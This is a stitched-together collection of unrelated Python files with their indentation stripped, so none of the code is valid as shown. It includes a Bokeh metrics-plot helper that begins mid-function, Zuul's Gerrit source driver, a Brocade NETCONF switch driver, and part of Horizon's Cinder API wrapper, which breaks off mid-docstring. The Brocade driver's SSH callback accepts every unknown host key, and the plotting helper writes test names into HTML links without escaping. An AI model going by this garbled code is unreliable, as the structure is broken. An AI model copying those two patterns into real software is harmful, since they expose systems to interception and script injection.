logging.error("Found no data: {}\n{}".format(test_names, dataframe))
return
# Split data into 1 dataframe per metric so we can easily make 1 graph
# per metric.
metric_to_dataframe = {}
for metric_name in set(np.unique(dataframe['metric_name']).tolist()):
metric_dataframe = dataframe[dataframe['metric_name'] == metric_name]
metric_to_dataframe[metric_name] = metric_dataframe
all_rows = []
for metric_name, dataframe in metric_to_dataframe.items():
plot, table_row = _make_plot_and_table(
metric_name, metric_to_dataframe[metric_name])
all_rows.extend([plot, table_row])
return all_rows
def _make_plot_and_table(metric_name, dataframe):
# Record some global stats about the entire suite of tests.
all_dates = np.unique(dataframe['run_date']).tolist()[-1::-1]
y_max = 1.1 * dataframe['metric_value'].max()
y_min = 0.9 * dataframe['metric_value'].min()
if y_max == 0 and y_min == 0:
y_max = 1.0
y_min = 0.0
# Split each test into its own dataframe.
test_name_to_df = {}
for test_name in np.unique(dataframe['test_name']).tolist():
test_name_to_df[test_name] = dataframe[dataframe['test_name'] == test_name]
tooltip_template = """
Value: @test_name<br/>Metric Value: @metric_value<br/>Job status: @job_status<br/>Date: @run_date"""
plot = figure(
title=metric_name,
plot_width=100*len(all_dates),
y_range=(y_min, y_max),
x_range=all_dates,
toolbar_location=None,
tools="tap",
tooltips=tooltip_template)
color_mapper = CategoricalColorMapper(
factors=['success', 'failure', 'timeout'],
palette=['#000000', '#ffffff', '#ffffff'])
all_tables = []
for test, df in test_name_to_df.items():
source = ColumnDataSource(data=df)
line = plot.line(
x='run_date', y='metric_value', line_width=3, color='#000000',
source=source)
plot.circle(
x='run_date',
y='metric_value',
source=source,
fill_color={'field': 'job_status', 'transform': color_mapper},
size=15)
# Create a table representation of the data from the plot above.
# Each date is a column and each row is a test.
# Add an extra first row for the headers and an extra first
# column for the test name.
data_grid = [['-' for _ in range(len(all_dates) + 1)] for _ in range(len(
test_name_to_df.keys()) + 1)]
data_grid[0] = ['Test'] + all_dates
# Offset by 1 to account for the test name column at index 0.
run_date_to_column_index = {date: index + 1 for index, date in enumerate(
all_dates)}
for row_i, test_name in enumerate(test_name_to_df.keys()):
row_i += 1 # Offset by 1 to account for the header row at index 0.
data_grid[row_i][0] = \
f"""<a href="metrics?test_name={test_name}">{test_name}</a>"""
for row in test_name_to_df[test_name].iterrows():
metric_value = row[1]['metric_value']
run_date = row[1]['run_date']
data_grid[row_i][run_date_to_column_index[run_date]] = \
f'{metric_value:0.2f}'
table = make_html_table(data_grid)
table_row = Div(text=table)
plot.xaxis.major_label_orientation = math.pi / 3
return plot, table_row
|
|
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import re
import time
from zuul import exceptions
from zuul.model import Change, Ref
from zuul.source import BaseSource
# Walk the change dependency tree to find a cycle
def detect_cycle(change, history=None):
if history is None:
history = []
else:
history = history[:]
history.append(change.number)
for dep in change.needs_changes:
if dep.number in history:
raise Exception("Dependency cycle detected: %s in %s" % (
dep.number, history))
detect_cycle(dep, history)
class GerritSource(BaseSource):
name = 'gerrit'
log = logging.getLogger("zuul.source.Gerrit")
replication_timeout = 300
replication_retry_interval = 5
depends_on_re = re.compile(r"^Depends-On: (I[0-9a-f]{40})\s*$",
re.MULTILINE | re.IGNORECASE)
def getRefSha(self, project, ref):
refs = {}
try:
refs = self.connection.getInfoRefs(project)
except:
self.log.exception("Exception looking for ref %s" %
ref)
sha = refs.get(ref, '')
return sha
def _waitForRefSha(self, project, ref, old_sha=''):
# Wait for the ref to show up in the repo
start = time.time()
while time.time() - start < self.replication_timeout:
sha = self.getRefSha(project.name, ref)
if old_sha != sha:
return True
time.sleep(self.replication_retry_interval)
return False
def isMerged(self, change, head=None):
self.log.debug("Checking if change %s is merged" % change)
if not change.number:
self.log.debug("Change has no number; considering it merged")
# Good question. It's probably ref-updated, which, ah,
# means it's merged.
return True
data = self.connection.query(change.number)
change._data = data
change.is_merged = self._isMerged(change)
if change.is_merged:
self.log.debug("Change %s is merged" % (change,))
else:
self.log.debug("Change %s is not merged" % (change,))
if not head:
return change.is_merged
if not change.is_merged:
return False
ref = 'refs/heads/' + change.branch
self.log.debug("Waiting for %s to appear in git repo" % (change))
if self._waitForRefSha(change.project, ref, change._ref_sha):
self.log.debug("Change %s is in the git repo" %
(change))
return True
self.log.debug("Change %s did not appear in the git repo" %
(change))
return False
def _isMerged(self, change):
data = change._data
if not data:
return False
status = data.get('status')
if not status:
return False
if status == 'MERGED':
return True
return False
def canMerge(self, change, allow_needs):
if not change.number:
self.log.debug("Change has no number; considering it merged")
# Good question. It's probably ref-updated, which, ah,
# means it's merged.
return True
data = change._data
if not data:
return False
if 'submitRecords' not in data:
return False
try:
for sr in data['submitRecords']:
if sr['status'] == 'OK':
return True
elif sr['status'] == 'NOT_READY':
for label in sr['labels']:
if label['status'] in ['OK', 'MAY']:
continue
elif label['status'] in ['NEED', 'REJECT']:
# It may be our own rejection, so we ignore
if label['label'].lower() not in allow_needs:
return False
continue
else:
# IMPOSSIBLE
return False
else:
# CLOSED, RULE_ERROR
return False
except:
self.log.exception("Exception determining whether change"
"%s can merge:" % change)
return False
return True
def postConfig(self):
pass
def getChange(self, event, project):
if event.change_number:
refresh = False
change = self._getChange(event.change_number, event.patch_number,
refresh=refresh)
else:
change = Ref(project)
change.connection_name = self.connection.connection_name
change.ref = event.ref
change.oldrev = event.oldrev
change.newrev = event.newrev
change.url = self._getGitwebUrl(project, sha=event.newrev)
return change
def _getChange(self, number, patchset, refresh=False, history=None):
key = '%s,%s' % (number, patchset)
change = self.connection.getCachedChange(key)
if change and not refresh:
return change
if not change:
change = Change(None)
change.connection_name = self.connection.connection_name
change.number = number
change.patchset = patchset
key = '%s,%s' % (change.number, change.patchset)
self.connection.updateChangeCache(key, change)
try:
self._updateChange(change, history)
except Exception:
self.connection.deleteCachedChange(key)
raise
return change
def getProjectOpenChanges(self, project):
# This is a best-effort function in case Gerrit is unable to return
# a particular change. It happens.
query = "project:%s status:open" % (project.name,)
self.log.debug("Running query %s to get project open changes" %
(query,))
data = self.connection.simpleQuery(query)
changes = []
for record in data:
try:
changes.append(
self._getChange(record['number'],
record['currentPatchSet']['number']))
except Exception:
self.log.exception("Unable to query change %s" %
(record.get('number'),))
return changes
def _getDependsOnFromCommit(self, message, change):
records = []
seen = set()
for match in self.depends_on_re.findall(message):
if match in seen:
self.log.debug("Ignoring duplicate Depends-On: %s" %
(match,))
continue
seen.add(match)
query = "change:%s" % (match,)
self.log.debug("Updating %s: Running query %s "
"to find needed changes" %
(change, query,))
records.extend(self.connection.simpleQuery(query))
return records
def _getNeededByFromCommit(self, change_id, change):
records = []
seen = set()
query = 'message:%s' % change_id
self.log.debug("Updating %s: Running query %s "
"to find changes needed-by" %
(change, query,))
results = self.connection.simpleQuery(query)
for result in results:
for match in self.depends_on_re.findall(
result['commitMessage']):
if match != change_id:
continue
key = (result['number'], result['currentPatchSet']['number'])
if key in seen:
continue
self.log.debug("Updating %s: Found change %s,%s "
"needs %s from commit" %
(change, key[0], key[1], change_id))
seen.add(key)
records.append(result)
return records
def _updateChange(self, change, history=None):
self.log.info("Updating %s" % (change,))
data = self.connection.query(change.number)
change._data = data
if change.patchset is None:
change.patchset = data['currentPatchSet']['number']
if 'project' not in data:
raise exceptions.ChangeNotFound(change.number, change.patchset)
change.project = self.sched.getProject(data['project'])
change.branch = data['branch']
change.url = data['url']
max_ps = 0
files = []
for ps in data['patchSets']:
if ps['number'] == change.patchset:
change.refspec = ps['ref']
for f in ps.get('files', []):
files.append(f['file'])
if int(ps['number']) > int(max_ps):
max_ps = ps['number']
if max_ps == change.patchset:
change.is_current_patchset = True
else:
change.is_current_patchset = False
change.files = files
change.is_merged = self._isMerged(change)
change.approvals = data['currentPatchSet'].get('approvals', [])
change.open = data['open']
change.status = data['status']
change.owner = data['owner']
if change.is_merged:
# This change is merged, so we don't need to look any further
# for dependencies.
self.log.debug("Updating %s: change is merged" % (change,))
return change
if history is None:
history = []
else:
history = history[:]
history.append(change.number)
needs_changes = []
if 'dependsOn' in data:
parts = data['dependsOn'][0]['ref'].split('/')
dep_num, dep_ps = parts[3], parts[4]
if dep_num in history:
raise Exception("Dependency cycle detected: %s in %s" % (
dep_num, history))
self.log.debug("Updating %s: Getting git-dependent change %s,%s" %
(change, dep_num, dep_ps))
dep = self._getChange(dep_num, dep_ps, history=history)
# Because we are not forcing a refresh in _getChange, it
# may return without executing this code, so if we are
# updating our change to add ourselves to a dependency
# cycle, we won't detect it. By explicitly performing a
# walk of the dependency tree, we will.
detect_cycle(dep, history)
if (not dep.is_merged) and dep not in needs_changes:
needs_changes.append(dep)
for record in self._getDependsOnFromCommit(data['commitMessage'],
change):
dep_num = record['number']
dep_ps = record['currentPatchSet']['number']
if dep_num in history:
raise Exception("Dependency cycle detected: %s in %s" % (
dep_num, history))
self.log.debug("Updating %s: Getting commit-dependent "
"change %s,%s" %
(change, dep_num, dep_ps))
dep = self._getChange(dep_num, dep_ps, history=history)
# Because we are not forcing a refresh in _getChange, it
# may return without executing this code, so if we are
# updating our change to add ourselves to a dependency
# cycle, we won't detect it. By explicitly performing a
# walk of the dependency tree, we will.
detect_cycle(dep, history)
if (not dep.is_merged) and dep not in needs_changes:
needs_changes.append(dep)
change.needs_changes = needs_changes
needed_by_changes = []
if 'neededBy' in data:
for needed in data['neededBy']:
parts = needed['ref'].split('/')
dep_num, dep_ps = parts[3], parts[4]
self.log.debug("Updating %s: Getting git-needed change %s,%s" %
(change, dep_num, dep_ps))
dep = self._getChange(dep_num, dep_ps)
if (not dep.is_merged) and dep.is_current_patchset:
needed_by_changes.append(dep)
for record in self._getNeededByFromCommit(data['id'], change):
dep_num = record['number']
dep_ps = record['currentPatchSet']['number']
self.log.debug("Updating %s: Getting commit-needed change %s,%s" %
(change, dep_num, dep_ps))
# Because a commit needed-by may be a cross-repo
# dependency, cause that change to refresh so that it will
# reference the latest patchset of its Depends-On (this
# change).
dep = self._getChange(dep_num, dep_ps, refresh=True)
if (not dep.is_merged) and dep.is_current_patchset:
needed_by_changes.append(dep)
change.needed_by_changes = needed_by_changes
return change
def getGitUrl(self, project):
return self.connection.getGitUrl(project)
def _getGitwebUrl(self, project, sha=None):
return self.connection.getGitwebUrl(project, sha)
|
|
# Copyright 2013 Brocade Communications System, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Brocade NOS Driver implements NETCONF over SSHv2 for
Neutron network life-cycle management.
"""
from ncclient import manager
from neutron.openstack.common import excutils
from neutron.openstack.common import log as logging
from neutron.plugins.brocade.nos import nctemplates as template
LOG = logging.getLogger(__name__)
SSH_PORT = 22
def nos_unknown_host_cb(host, fingerprint):
"""An unknown host callback.
Returns `True` if it finds the key acceptable,
and `False` if not. This default callback for NOS always returns 'True'
(i.e. trusts all hosts for now).
"""
return True
class NOSdriver():
"""NOS NETCONF interface driver for Neutron network.
Handles life-cycle management of Neutron network (leverages AMPP on NOS)
"""
def __init__(self):
self.mgr = None
def connect(self, host, username, password):
"""Connect via SSH and initialize the NETCONF session."""
# Use the persisted NETCONF connection
if self.mgr and self.mgr.connected:
return self.mgr
# Open new NETCONF connection
try:
self.mgr = manager.connect(host=host, port=SSH_PORT,
username=username, password=password,
unknown_host_cb=nos_unknown_host_cb)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Connect failed to switch: %s"), e)
LOG.debug(_("Connect success to host %(host)s:%(ssh_port)d"),
dict(host=host, ssh_port=SSH_PORT))
return self.mgr
def close_session(self):
"""Close NETCONF session."""
if self.mgr:
self.mgr.close_session()
self.mgr = None
def create_network(self, host, username, password, net_id):
"""Creates a new virtual network."""
name = template.OS_PORT_PROFILE_NAME.format(id=net_id)
try:
mgr = self.connect(host, username, password)
self.create_vlan_interface(mgr, net_id)
self.create_port_profile(mgr, name)
self.create_vlan_profile_for_port_profile(mgr, name)
self.configure_l2_mode_for_vlan_profile(mgr, name)
self.configure_trunk_mode_for_vlan_profile(mgr, name)
self.configure_allowed_vlans_for_vlan_profile(mgr, name, net_id)
self.activate_port_profile(mgr, name)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.exception(_("NETCONF error: %s"), ex)
self.close_session()
def delete_network(self, host, username, password, net_id):
"""Deletes a virtual network."""
name = template.OS_PORT_PROFILE_NAME.format(id=net_id)
try:
mgr = self.connect(host, username, password)
self.deactivate_port_profile(mgr, name)
self.delete_port_profile(mgr, name)
self.delete_vlan_interface(mgr, net_id)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.exception(_("NETCONF error: %s"), ex)
self.close_session()
def associate_mac_to_network(self, host, username, password,
net_id, mac):
"""Associates a MAC address to virtual network."""
name = template.OS_PORT_PROFILE_NAME.format(id=net_id)
try:
mgr = self.connect(host, username, password)
self.associate_mac_to_port_profile(mgr, name, mac)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.exception(_("NETCONF error: %s"), ex)
self.close_session()
def dissociate_mac_from_network(self, host, username, password,
net_id, mac):
"""Dissociates a MAC address from virtual network."""
name = template.OS_PORT_PROFILE_NAME.format(id=net_id)
try:
mgr = self.connect(host, username, password)
self.dissociate_mac_from_port_profile(mgr, name, mac)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.exception(_("NETCONF error: %s"), ex)
self.close_session()
def create_vlan_interface(self, mgr, vlan_id):
"""Configures a VLAN interface."""
confstr = template.CREATE_VLAN_INTERFACE.format(vlan_id=vlan_id)
mgr.edit_config(target='running', config=confstr)
def delete_vlan_interface(self, mgr, vlan_id):
"""Deletes a VLAN interface."""
confstr = template.DELETE_VLAN_INTERFACE.format(vlan_id=vlan_id)
mgr.edit_config(target='running', config=confstr)
def get_port_profiles(self, mgr):
"""Retrieves all port profiles."""
filterstr = template.PORT_PROFILE_XPATH_FILTER
response = mgr.get_config(source='running',
filter=('xpath', filterstr)).data_xml
return response
def get_port_profile(self, mgr, name):
"""Retrieves a port profile."""
filterstr = template.PORT_PROFILE_NAME_XPATH_FILTER.format(name=name)
response = mgr.get_config(source='running',
filter=('xpath', filterstr)).data_xml
return response
def create_port_profile(self, mgr, name):
"""Creates a port profile."""
confstr = template.CREATE_PORT_PROFILE.format(name=name)
mgr.edit_config(target='running', config=confstr)
def delete_port_profile(self, mgr, name):
"""Deletes a port profile."""
confstr = template.DELETE_PORT_PROFILE.format(name=name)
mgr.edit_config(target='running', config=confstr)
def activate_port_profile(self, mgr, name):
"""Activates a port profile."""
confstr = template.ACTIVATE_PORT_PROFILE.format(name=name)
mgr.edit_config(target='running', config=confstr)
def deactivate_port_profile(self, mgr, name):
"""Deactivates a port profile."""
confstr = template.DEACTIVATE_PORT_PROFILE.format(name=name)
mgr.edit_config(target='running', config=confstr)
def associate_mac_to_port_profile(self, mgr, name, mac_address):
"""Associates a MAC address to a port profile."""
confstr = template.ASSOCIATE_MAC_TO_PORT_PROFILE.format(
name=name, mac_address=mac_address)
mgr.edit_config(target='running', config=confstr)
def dissociate_mac_from_port_profile(self, mgr, name, mac_address):
"""Dissociates a MAC address from a port profile."""
confstr = template.DISSOCIATE_MAC_FROM_PORT_PROFILE.format(
name=name, mac_address=mac_address)
mgr.edit_config(target='running', config=confstr)
def create_vlan_profile_for_port_profile(self, mgr, name):
"""Creates VLAN sub-profile for port profile."""
confstr = template.CREATE_VLAN_PROFILE_FOR_PORT_PROFILE.format(
name=name)
mgr.edit_config(target='running', config=confstr)
def configure_l2_mode_for_vlan_profile(self, mgr, name):
"""Configures L2 mode for VLAN sub-profile."""
confstr = template.CONFIGURE_L2_MODE_FOR_VLAN_PROFILE.format(
name=name)
mgr.edit_config(target='running', config=confstr)
def configure_trunk_mode_for_vlan_profile(self, mgr, name):
"""Configures trunk mode for VLAN sub-profile."""
confstr = template.CONFIGURE_TRUNK_MODE_FOR_VLAN_PROFILE.format(
name=name)
mgr.edit_config(target='running', config=confstr)
def configure_allowed_vlans_for_vlan_profile(self, mgr, name, vlan_id):
"""Configures allowed VLANs for VLAN sub-profile."""
confstr = template.CONFIGURE_ALLOWED_VLANS_FOR_VLAN_PROFILE.format(
name=name, vlan_id=vlan_id)
mgr.edit_config(target='running', config=confstr)
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 OpenStack Foundation
# Copyright 2012 Nebula, Inc.
# Copyright (c) 2012 X.commerce, a business unit of eBay Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import logging
from django.conf import settings
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from cinderclient.v2.contrib import list_extensions as cinder_list_extensions
from horizon import exceptions
from horizon.utils.memoized import memoized # noqa
from openstack_dashboard.api import base
from openstack_dashboard.api import nova
LOG = logging.getLogger(__name__)
# API static values
VOLUME_STATE_AVAILABLE = "available"
DEFAULT_QUOTA_NAME = 'default'
# Available consumer choices associated with QOS Specs
CONSUMER_CHOICES = (
('back-end', _('back-end')),
('front-end', _('front-end')),
('both', pgettext_lazy('Both of front-end and back-end', u'both')),
)
VERSIONS = base.APIVersionManager("volume", preferred_version=2)
try:
from cinderclient.v2 import client as cinder_client_v2
VERSIONS.load_supported_version(2, {"client": cinder_client_v2,
"version": 2})
except ImportError:
pass
class BaseCinderAPIResourceWrapper(base.APIResourceWrapper):
@property
def name(self):
# If a volume doesn't have a name, use its id.
return (getattr(self._apiresource, 'name', None) or
getattr(self._apiresource, 'display_name', None) or
getattr(self._apiresource, 'id', None))
@property
def description(self):
return (getattr(self._apiresource, 'description', None) or
getattr(self._apiresource, 'display_description', None))
def to_dict(self):
obj = {}
for key in self._attrs:
obj[key] = getattr(self._apiresource, key, None)
return obj
class Volume(BaseCinderAPIResourceWrapper):
_attrs = ['id', 'name', 'description', 'size', 'status', 'created_at',
'volume_type', 'availability_zone', 'imageRef', 'bootable',
'snapshot_id', 'source_volid', 'attachments', 'tenant_name',
'os-vol-host-attr:host', 'os-vol-tenant-attr:tenant_id',
'metadata', 'volume_image_metadata', 'encrypted', 'transfer']
@property
def is_bootable(self):
return self.bootable == 'true'
class VolumeSnapshot(BaseCinderAPIResourceWrapper):
_attrs = ['id', 'name', 'description', 'size', 'status',
'created_at', 'volume_id',
'os-extended-snapshot-attributes:project_id']
class VolumeType(BaseCinderAPIResourceWrapper):
_attrs = ['id', 'name', 'extra_specs', 'created_at',
'os-extended-snapshot-attributes:project_id']
class VolumeBackup(BaseCinderAPIResourceWrapper):
_attrs = ['id', 'name', 'description', 'container', 'size', 'status',
'created_at', 'volume_id', 'availability_zone']
_volume = None
@property
def volume(self):
return self._volume
@volume.setter
def volume(self, value):
self._volume = value
class VolTypeExtraSpec(object):
def __init__(self, type_id, key, val):
self.type_id = type_id
self.id = key
self.key = key
self.value = val
class QosSpec(object):
def __init__(self, id, key, val):
self.id = id
self.key = key
self.value = val
class VolumeTransfer(base.APIResourceWrapper):
_attrs = ['id', 'name', 'created_at', 'volume_id', 'auth_key']
@memoized
def cinderclient(request):
api_version = VERSIONS.get_active_version()
insecure = getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)
cacert = getattr(settings, 'OPENSTACK_SSL_CACERT', None)
cinder_url = ""
try:
# The cinder client assumes that the v2 endpoint type will be
# 'volumev2'.
if api_version['version'] == 2:
try:
cinder_url = base.url_for(request, 'volumev2')
except exceptions.ServiceCatalogException:
LOG.warning("Cinder v2 requested but no 'volumev2' service "
"type available in Keystone catalog.")
except exceptions.ServiceCatalogException:
LOG.debug('no volume service configured.')
raise
c = api_version['client'].Client(request.user.username,
request.user.token.id,
project_id=request.user.tenant_id,
auth_url=cinder_url,
insecure=insecure,
cacert=cacert,
http_log_debug=settings.DEBUG)
c.client.auth_token = request.user.token.id
c.client.management_url = cinder_url
return c
def _replace_v2_parameters(data):
if VERSIONS.active < 2:
data['display_name'] = data['name']
data['display_description'] = data['description']
del data['name']
del data['description']
return data
def version_get():
api_version = VERSIONS.get_active_version()
return api_version['version']
def volume_list(request, search_opts=None):
"""To see all volumes in the cloud as an admin you can pass in a special
search option: {'all_tenants': 1}
"""
c_client = cinderclient(request)
if c_client is None:
return []
# build a dictionary of volume_id -> transfer
transfers = {t.volume_id: t
for t in transfer_list(request, search_opts=search_opts)}
volumes = []
for v in c_client.volumes.list(search_opts=search_opts):
v.transfer = transfers.get(v.id)
volumes.append(Volume(v))
return volumes
def volume_get(request, volume_id):
volume_data = cinderclient(request).volumes.get(volume_id)
for attachment in volume_data.attachments:
if "server_id" in attachment:
instance = nova.server_get(request, attachment['server_id'])
attachment['instance_name'] = instance.name
else:
# Nova volume can occasionally send back error'd attachments
# the lack a server_id property; to work around that we'll
# give the attached instance a generic name.
attachment['instance_name'] = _("Unknown instance")
volume_data.transfer = None
if volume_data.status == 'awaiting-transfer':
for transfer in transfer_list(request):
if transfer.volume_id == volume_id:
volume_data.transfer = transfer
break
return Volume(volume_data)
def volume_create(request, size, name, description, volume_type,
snapshot_id=None, metadata=None, image_id=None,
availability_zone=None, source_volid=None):
data = {'name': name,
'description': description,
'volume_type': volume_type,
'snapshot_id': snapshot_id,
'metadata': metadata,
'imageRef': image_id,
'availability_zone': availability_zone,
'source_volid': source_volid}
data = _replace_v2_parameters(data)
volume = cinderclient(request).volumes.create(size, **data)
return Volume(volume)
def volume_extend(request, volume_id, new_size):
return cinderclient(request).volumes.extend(volume_id, new_size)
def volume_delete(request, volume_id):
return cinderclient(request).volumes.delete(volume_id)
def volume_retype(request, volume_id, new_type, migration_policy):
return cinderclient(request).volumes.retype(volume_id,
new_type,
migration_policy)
def volume_set_bootable(request, volume_id, bootable):
return cinderclient(request).volumes.set_bootable(volume_id,
bootable)
def volume_update(request, volume_id, name, description):
vol_data = {'name': name,
'description': description}
vol_data = _replace_v2_parameters(vol_data)
return cinderclient(request).volumes.update(volume_id,
**vol_data)
def volume_reset_state(request, volume_id, state):
return cinderclient(request).volumes.reset_state(volume_id, state)
def volume_upload_to_image(request, volume_id, force, image_name,
container_format, disk_format):
return cinderclient(request).volumes.upload_to_image(volume_id,
force,
image_name,
container_format,
disk_format)
def volume_get_encryption_metadata(request, volume_id):
return cinderclient(request).volumes.get_encryption_metadata(volume_id)
def volume_snapshot_get(request, snapshot_id):
snapshot = cinderclient(request).volume_snapshots.get(snapshot_id)
return VolumeSnapshot(snapshot)
def volume_snapshot_list(request, search_opts=None):
c_client = cinderclient(request)
if c_client is None:
return []
return [VolumeSnapshot(s) for s in c_client.volume_snapshots.list(
search_opts=search_opts)]
def volume_snapshot_create(request, volume_id, name,
description=None, force=False):
data = {'name': name,
'description': description,
'force': force}
data = _replace_v2_parameters(data)
return VolumeSnapshot(cinderclient(request).volume_snapshots.create(
volume_id, **data))
def volume_snapshot_delete(request, snapshot_id):
return cinderclient(request).volume_snapshots.delete(snapshot_id)
def volume_snapshot_update(request, snapshot_id, name, description):
snapshot_data = {'name': name,
'description': description}
snapshot_data = _replace_v2_parameters(snapshot_data)
return cinderclient(request).volume_snapshots.update(snapshot_id,
**snapshot_data)
def volume_snapshot_reset_state(request, snapshot_id, state):
return cinderclient(request).volume_snapshots.reset_state(
snapshot_id, state)
@memoized
def volume_backup_supported(request):
"""This method will determine if cinder supports backup.
"""
# TODO(lcheng) Cinder does not expose the information if cinder
# backup is configured yet. This is a workaround until that
# capability is available.
# https://bugs.launchpad.net/cinder/+bug/1334856
cinder_config = getattr(settings, 'OPENSTACK_CINDER_FEATURES', {})
return cinder_config.get('enable_backup', False)
def volume_backup_get(request, backup_id):
backup = cinderclient(request).backups.get(backup_id)
return VolumeBackup(backup)
def volume_backup_list(request):
c_client = cinderclient(request)
if c_client is None:
return []
return [VolumeBackup(b) for b in c_client.backups.list()]
def volume_backup_create(request,
volume_id,
container_name,
name,
description):
backup = cinderclient(request).backups.create(
volume_id,
container=container_name,
name=name,
description=description)
return VolumeBackup(backup)
def volume_backup_delete(request, backup_id):
return cinderclient(request).backups.delete(backup_id)
def volume_backup_restore(request, backup_id, volume_id):
return cinderclient(request).restores.restore(backup_id=backup_id,
volume_id=volume_id)
def volume_manage(request,
host,
identifier,
id_type,
name,
description,
volume_type,
availability_zone,
metadata,
bootable):
source = {id_type: identifier}
return cinderclient(request).volumes.manage(
host=host,
ref=source,
name=name,
description=description,
volume_type=volume_type,
availability_zone=availability_zone,
metadata=metadata,
bootable=bootable)
def volume_unmanage(request, volume_id):
return cinderclient(request).volumes.unmanage(volume=volume_id)
def tenant_quota_get(request, tenant_id):
c_client = cinderclient(request)
if c_client is None:
return base.QuotaSet()
return base.QuotaSet(c_client.quotas.get(tenant_id))
def tenant_quota_update(request, tenant_id, **kwargs):
return cinderclient(request).quotas.update(tenant_id, **kwargs)
def default_quota_get(request, tenant_id):
return base.QuotaSet(cinderclient(request).quotas.defaults(tenant_id))
def volume_type_list_with_qos_associations(request):
vol_types = volume_type_list(request)
vol_types_dict = {}
# initialize and build a dictionary for lookup access below
for vol_type in vol_types:
vol_type.associated_qos_spec = ""
vol_types_dict[vol_type.id] = vol_type
# get all currently defined qos specs
qos_specs = qos_spec_list(request)
for qos_spec in qos_specs:
# get all volume types this qos spec is associated with
assoc_vol_types = qos_spec_get_associations(request, qos_spec.id)
for assoc_vol_type in assoc_vol_types:
# update volume type to hold this association info
vol_type = vol_types_dict[assoc_vol_type.id]
vol_type.associated_qos_spec = qos_spec.name
return vol_types
def default_quota_update(request, **kwargs):
cinderclient(request).quota_classes.update(DEFAULT_QUOTA_NAME, **kwargs)
def volume_type_list(request):
return cinderclient(request).volume_types.list()
def volume_type_create(request, name):
return cinderclient(request).volume_types.create(name)
def volume_type_delete(request, volume_type_id):
return cinderclient(request).volume_types.delete(volume_type_id)
def volume_type_get(request, volume_type_id):
return cinderclient(request).volume_types.get(volume_type_id)
def volume_encryption_type_create(request, volume_type_id, data):
return cinderclient(request).volume_encryption_types.create(volume_type_id,
specs=data)
def volume_encryption_type_delete(request, volume_type_id):
return cinderclient(request).volume_encryption_types.delete(volume_type_id)
def volume_encryption_type_get(request, volume_type_id):
return cinderclient(request).volume_encryption_types.get(volume_type_id)
def volume_encryption_type_list(request):
return cinderclient(request).volume_encryption_types.list()
def volume_type_extra_get(request, type_id, raw=False):
vol_type = volume_type_get(request, type_id)
extras = vol_type.get_keys()
if raw:
return extras
return [VolTypeExtraSpec(type_id, key, value) for
key, value in extras.items()]
def volume_type_extra_set(request, type_id, metadata):
vol_type = volume_type_get(request, type_id)
if not metadata:
return None
return vol_type.set_keys(metadata)
def volume_type_extra_delete(request, type_id, keys):
vol_type = volume_type_get(request, type_id)
return vol_type.unset_keys([keys])
def qos_spec_list(request):
return cinderclient(request).qos_specs.list()
def qos_spec_get(request, qos_spec_id):
return cinderclient(request).qos_specs.get(qos_spec_id)
def qos_spec_delete(request, qos_spec_id):
return cinderclient(request).qos_specs.delete(qos_spec_id, force=True)
def qos_spec_create(request, name, specs):
return cinderclient(request).qos_specs.create(name, specs)
def qos_spec_get_keys(request, qos_spec_id, raw=False):
spec = qos_spec_get(request, qos_spec_id)
qos_specs = spec.specs
if raw:
return spec
return [QosSpec(qos_spec_id, key, value) for
key, value in qos_specs.items()]
def qos_spec_set_keys(request, qos_spec_id, specs):
return cinderclient(request).qos_specs.set_keys(qos_spec_id, specs)
def qos_spec_unset_keys(request, qos_spec_id, specs):
return cinderclient(request).qos_specs.unset_keys(qos_spec_id, specs)
def qos_spec_associate(request, qos_specs, vol_type_id):
return cinderclient(request).qos_specs.associate(qos_specs, vol_type_id)
def qos_spec_disassociate(request, qos_specs, vol_type_id):
return cinderclient(request).qos_specs.disassociate(qos_specs, vol_type_id)
def qos_spec_get_associations(request, qos_spec_id):
return cinderclient(request).qos_specs.get_associations(qos_spec_id)
@memoized
def tenant_absolute_limits(request):
limits = cinderclient(request).limits.get().absolute
limits_dict = {}
for limit in limits:
if limit.value < 0:
# In some cases, the absolute limits data in Cinder can get
# out of sync causing the total.*Used limits to return
# negative values instead of 0. For such cases, replace
# negative values with 0.
if limit.name.startswith('total') and limit.name.endswith('Used'):
limits_dict[limit.name] = 0
else:
# -1 is used to represent unlimited quotas
limits_dict[limit.name] = float("inf")
else:
limits_dict[limit.name] = limit.value
return limits_dict
def service_list(request):
return cinderclient(request).services.list()
def availability_zone_list(request, detailed=False):
return cinderclient(request).availability_zones.list(detailed=detailed)
@memoized
def list_extensions(request):
return cinder_list_extensions.ListExtManager(cinderclient(request))\
.show_all()
@memoized
def extension_supported(request, extension_name):
"""This method will determine if Cinder supports a given extension name.
"""
extensions = list_extensions(request)
for extension in extensions:
if extension.name == extension_name:
return True
return False
def transfer_list(request, detailed=True, search_opts=None):
"""To see all volumes transfers as an admin pass in a special
search option: {'all_tenants': 1}
